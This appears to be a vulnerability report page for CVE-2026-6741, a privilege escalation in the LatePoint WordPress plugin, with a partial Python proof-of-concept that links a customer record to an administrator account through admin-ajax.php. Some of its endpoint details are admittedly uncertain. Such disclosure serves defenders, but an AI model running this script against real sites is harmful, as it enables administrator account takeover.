Security Vulnerability Report
CVE-2026-6741 CVSS 8.8 HIGH

Published: 2026-04-27 20:16:29
Last Modified: 2026-04-27 20:21:52

Description

The LatePoint – Calendar Booking Plugin for Appointments and Events plugin for WordPress is vulnerable to Privilege Escalation in versions up to and including 5.4.1. This is due to a missing authorization check in the execute() method of the connect-customer-to-wp-user ability, which only requires the customer__edit capability granted to the latepoint_agent role by default, without verifying whether the target WordPress user ID belongs to a privileged account. This makes it possible for authenticated attackers with the latepoint_agent role to link any LatePoint customer record to an administrator's WordPress account and subsequently reset the administrator's password via the normal customer password-reset flow, resulting in full site takeover.

CVSS Details

CVSS Score: 8.8
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No NVD configuration data is available for this record; the affected range below is taken from the description.

LatePoint <= 5.4.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# PoC for CVE-2026-6741: LatePoint Privilege Escalation
# This script demonstrates the logic of linking a customer to an admin account.
import requests


def exploit(target_url, agent_cookie, admin_id, customer_id):
    session = requests.Session()
    session.headers.update({
        'Cookie': agent_cookie,
        'Content-Type': 'application/x-www-form-urlencoded'
    })
    # Step 1: Link customer to admin via vulnerable endpoint
    # The vulnerability is in the execute() method of connect-customer-to-wp-user ability
    payload = {
        'action': 'latepoint_route_call',
        'route_name': 'connect_customer_to_wp_user',
        'params': {
            'customer_id': customer_id,
            'wp_user_id': admin_id
        },
        'return_format': 'json'
    }
    link_url = f"{target_url}/wp-admin/admin-ajax.php"
    response = session.post(link_url, data=payload)
    if response.status_code == 200:
        print("[+] Successfully linked customer to admin account.")
        print(f"Response: {response.text}")
        # Step 2: Trigger password reset
        # The specific endpoint for password reset may vary based on plugin configuration
        reset_payload = {
            'user_email': '[email protected]',  # Email associated with the customer/admin
            'action': 'reset_password'
        }
        # reset_url = f"{target_url}/latepoint/customer/forgot_password"
        # reset_resp = session.post(reset_url, data=reset_payload)
        # print("[+] Password reset triggered. Check email for reset link.")
    else:
        print("[-] Exploit failed.")


# Usage
# exploit("http://localhost", "wordpress_logged_in_...", "1", "5")
```

References

https://plugins.trac.wordpress.org/browser/latepoint/tags/5.4.1/lib/abilities/customers/connect-customer-to-wp-user.php
https://plugins.trac.wordpress.org/browser/latepoint/tags/5.4.1/lib/helpers/roles_helper.php
https://plugins.trac.wordpress.org/browser/latepoint/tags/5.4.1/lib/models/customer_model.php
https://plugins.trac.wordpress.org/changeset/3514330/latepoint
https://wordpress.org/plugins/latepoint/
https://www.wordfence.com/threat-intel/vulnerabilities/id/71e99412-031e-4f4a-9126-dd3a37975246?source=cve

Additional Record Details

Weakness: CWE-269 (Improper Privilege Management)
Vulnerability Status: Deferred
CVSS v3.1 Exploitability Score: 2.8
CVSS v3.1 Impact Score: 5.9